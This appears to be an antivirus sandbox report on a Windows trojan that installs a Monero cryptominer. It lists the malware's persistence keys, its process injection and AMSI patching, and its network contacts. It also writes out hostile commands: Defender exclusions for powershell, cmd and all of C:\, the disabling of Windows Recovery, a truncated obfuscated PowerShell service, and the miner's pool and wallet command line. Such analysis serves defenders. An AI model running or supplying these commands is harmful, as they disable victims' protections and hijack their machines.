Technical Information
To ensure autorun and distribution
Modifies the following registry keys
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Run] 'v4' = '%LOCALAPPDATA%\Microsoft\Windows\Explorer\Win-v43.exe'
Creates or modifies the following files
- <SYSTEM32>\tasks\v4
Sets the following service settings
- [HKLM\SYSTEM\CurrentControlSet\Services\WinRing0_1_2_0] 'ImagePath' = '<SYSTEM32>\WinRing0x64.sys'
- [HKLM\SYSTEM\CurrentControlSet\Services\$SHsvc] 'Start' = '00000002'
- [HKLM\SYSTEM\CurrentControlSet\Services\$SHsvc] 'ImagePath' = 'cmd.exe /c "powershell.exe -Command ""function Local:xFoeZCtEmNcy{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$SvfRbd...
Creates the following services
- 'WinRing0_1_2_0' <SYSTEM32>\WinRing0x64.sys
- '$SHsvc' cmd.exe /c "powershell.exe -Command ""function Local:xFoeZCtEmNcy{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$SvfRbdsdCXORwp,[Parameter(Position=1)][Type]$PDewJOdpfv)$TcgXvikmNTE=...
Malicious functions
To complicate detection of its presence in the operating system,
blocks the following features:
- Windows Recovery Environment (WinRE)
adds antivirus exclusion:
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Add-MpPreference -ExclusionProcess 'powershell.exe'"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Add-MpPreference -ExclusionProcess 'cmd.exe'; Add-MpPreference -ExclusionPath 'C:\'"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Add-MpPreference -ExclusionProcess 'WinTemp-v4.exe'; Add-MpPreference -ExclusionProcess 'Win-v42.exe'; Add-MpPreference -ExclusionProcess 'Win-v43.exe'"
Injects code into
the following system processes:
- <SYSTEM32>\cmd.exe
- %WINDIR%\syswow64\svchost.exe
- <SYSTEM32>\winlogon.exe
- <SYSTEM32>\lsass.exe
- <SYSTEM32>\svchost.exe
- <SYSTEM32>\dwm.exe
- <SYSTEM32>\wudfhost.exe
- <SYSTEM32>\spoolsv.exe
- <SYSTEM32>\sihost.exe
- <SYSTEM32>\taskhostw.exe
- %WINDIR%\explorer.exe
- <SYSTEM32>\runtimebroker.exe
- <SYSTEM32>\dllhost.exe
- <SYSTEM32>\securityhealthsystray.exe
- <SYSTEM32>\oobe\useroobebroker.exe
- <SYSTEM32>\sppextcomobj.exe
- <SYSTEM32>\slui.exe
- <SYSTEM32>\werfault.exe
the following user processes:
- iexplore.exe
- firefox.exe
- win-v41.exe
Hooks functions
in browsers
- iexplore.exe process, advapi32.dll module
- firefox.exe process, advapi32.dll module
Patches code
in dll
- runtimebroker.exe process, ADVAPI32.dll module
- zsygehah.exe process, SECHOST.dll module
- zsygehah.exe process, ADVAPI32.dll module
- cmd.exe process, SECHOST.dll module
- cmd.exe process, ADVAPI32.dll module
- win-v41.exe process, SECHOST.dll module
- win-v41.exe process, ADVAPI32.dll module
in AMSI dll
- powershell.exe process, Amsi.dll module
in NTDLL dll
- zsygehah.exe process, ntdll.dll module
- cmd.exe process, ntdll.dll module
- win-v41.exe process, ntdll.dll module
Terminates or attempts to terminate
the following system processes:
- <SYSTEM32>\cmd.exe
Modifies file system
Creates the following files
- %WINDIR%\win-v41.exe
- <SYSTEM32>\win-v42.exe
- %LOCALAPPDATA%\microsoft\windows\explorer\win-v43.exe
- nul
- %TEMP%\thcbd7.tmp
- %TEMP%\thd85b.tmp
- %WINDIR%\temp\__psscriptpolicytest_opvpojdo.ajg.ps1
- %WINDIR%\temp\__psscriptpolicytest_sktg5gvz.xds.psm1
- %WINDIR%\temp\content\1112-3276-powershell.exe-15-26-08-566.dump
- %WINDIR%\temp\content\1112-3276-powershell.exe-15-26-08-918.dump
- %WINDIR%\temp\content\1112-3276-powershell.exe-15-26-09-170.dump
- %WINDIR%\temp\content\1112-3276-powershell.exe-15-26-09-232.dump
- %WINDIR%\temp\content\1112-3276-powershell.exe-15-26-09-349.dump
- %WINDIR%\temp\content\1112-3276-powershell.exe-15-26-09-434.dump
- <SYSTEM32>\config\systemprofile\appdata\local\microsoft\windows\powershell\startupprofiledata-noninteractive
Deletes following files that it created itself
- %WINDIR%\temp\__psscriptpolicytest_opvpojdo.ajg.ps1
- %WINDIR%\temp\__psscriptpolicytest_sktg5gvz.xds.psm1
Network activity
Connects to
- 'xa##30k.com':443
- '19#.#32.210.172':80
- 'x1.#.lencr.org':80
- 'r1#.#.lencr.org':80
- 'si#####rity-drop.com':7777
- 'ap###.ipify.org':443
- '19#.#32.214.172':80
- '15#.#4.208.107':3333
TCP
HTTP GET requests
- http://r1#.#.lencr.org/35.crl
- http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?5a##############
Other
- 'xa##30k.com':443
- 'ap###.ipify.org':443
- 'si#####rity-drop.com':7777
- '15#.#4.208.107':3333
UDP
- DNS ASK xa##30k.com
- DNS ASK x1.#.lencr.org
- DNS ASK r1#.#.lencr.org
- DNS ASK si#####rity-drop.com
- DNS ASK ap###.ipify.org
Miscellaneous
Creates and executes the following
- '%WINDIR%\win-v41.exe'
Executes the following
- '<SYSTEM32>\schtasks.exe' /Create /TN "v4" /TR "<SYSTEM32>\Win-v42.exe" /SC ONLOGON /RL HIGHEST /F
- '<SYSTEM32>\cmd.exe' /C reagentc /disable
- '<SYSTEM32>\reagentc.exe' /disable
- '<SYSTEM32>\cmd.exe' /C takeown /F "<SYSTEM32>\reagentc.exe"
- '<SYSTEM32>\takeown.exe' /F "<SYSTEM32>\reagentc.exe"
- '<SYSTEM32>\cmd.exe' /C icacls "<SYSTEM32>\reagentc.exe" /grant Administrators:F
- '<SYSTEM32>\icacls.exe' "<SYSTEM32>\reagentc.exe" /grant Administrators:F
- '<SYSTEM32>\cmd.exe' /C icacls "<SYSTEM32>\reagentc.exe" /deny Everyone:RX
- '<SYSTEM32>\icacls.exe' "<SYSTEM32>\reagentc.exe" /deny Everyone:RX
- '<SYSTEM32>\powercfg.exe' /change monitor-timeout-ac 0
- '<SYSTEM32>\powercfg.exe' /change monitor-timeout-dc 0
- '<SYSTEM32>\powercfg.exe' /change standby-timeout-ac 0
- '<SYSTEM32>\powercfg.exe' /change standby-timeout-dc 0
- '<SYSTEM32>\powercfg.exe' /change hibernate-timeout-ac 0
- '<SYSTEM32>\powercfg.exe' /change hibernate-timeout-dc 0
- '<SYSTEM32>\powercfg.exe' /hibernate off
- '<SYSTEM32>\cmd.exe' /c ping -n 1 -w 1000 8.#.8.8 > nul
- '<SYSTEM32>\ping.exe' -n 1 -w 1000 8.#.8.8
- '<SYSTEM32>\cmd.exe' --algo rx/0 --url 15#.#4.208.107:3333 --user 439RTMrajyhLb4cLK4YDejMx4rp8b5VDR4YX4auqWGbgUBj1c4wVbvc69bVUmJuJ8rXWwCU7LAGL9MkFaMwDwXjo6FrM5Y3/x -p x -k --cpu-max-threads-hint=40
- '%WINDIR%\syswow64\svchost.exe'
- '<SYSTEM32>\cmd.exe' /c "powershell.exe -Command ""function Local:xFoeZCtEmNcy{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$SvfRbdsdCXORwp,[Parameter(Position=1)][Type]$PDewJOdpfv)$TcgXvikmNTE=[AppDoma...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Add-MpPreference -ExclusionProcess 'powershell.exe'"' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Add-MpPreference -ExclusionProcess 'cmd.exe'; Add-MpPreference -ExclusionPath 'C:\'"' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Add-MpPreference -ExclusionProcess 'WinTemp-v4.exe'; Add-MpPreference -ExclusionProcess 'Win-v42.exe'; Add-MpPreference -ExclusionProcess 'Win-v43.exe'"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C reagentc /disable' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C takeown /F "<SYSTEM32>\reagentc.exe"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C icacls "<SYSTEM32>\reagentc.exe" /grant Administrators:F' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C icacls "<SYSTEM32>\reagentc.exe" /deny Everyone:RX' (with hidden window)
- '<SYSTEM32>\powercfg.exe' /change monitor-timeout-ac 0' (with hidden window)
- '<SYSTEM32>\powercfg.exe' /change monitor-timeout-dc 0' (with hidden window)
- '<SYSTEM32>\powercfg.exe' /change standby-timeout-ac 0' (with hidden window)
- '<SYSTEM32>\powercfg.exe' /change standby-timeout-dc 0' (with hidden window)
- '<SYSTEM32>\powercfg.exe' /change hibernate-timeout-ac 0' (with hidden window)
- '<SYSTEM32>\powercfg.exe' /change hibernate-timeout-dc 0' (with hidden window)
- '<SYSTEM32>\powercfg.exe' /hibernate off' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c ping -n 1 -w 1000 8.#.8.8 > nul' (with hidden window)
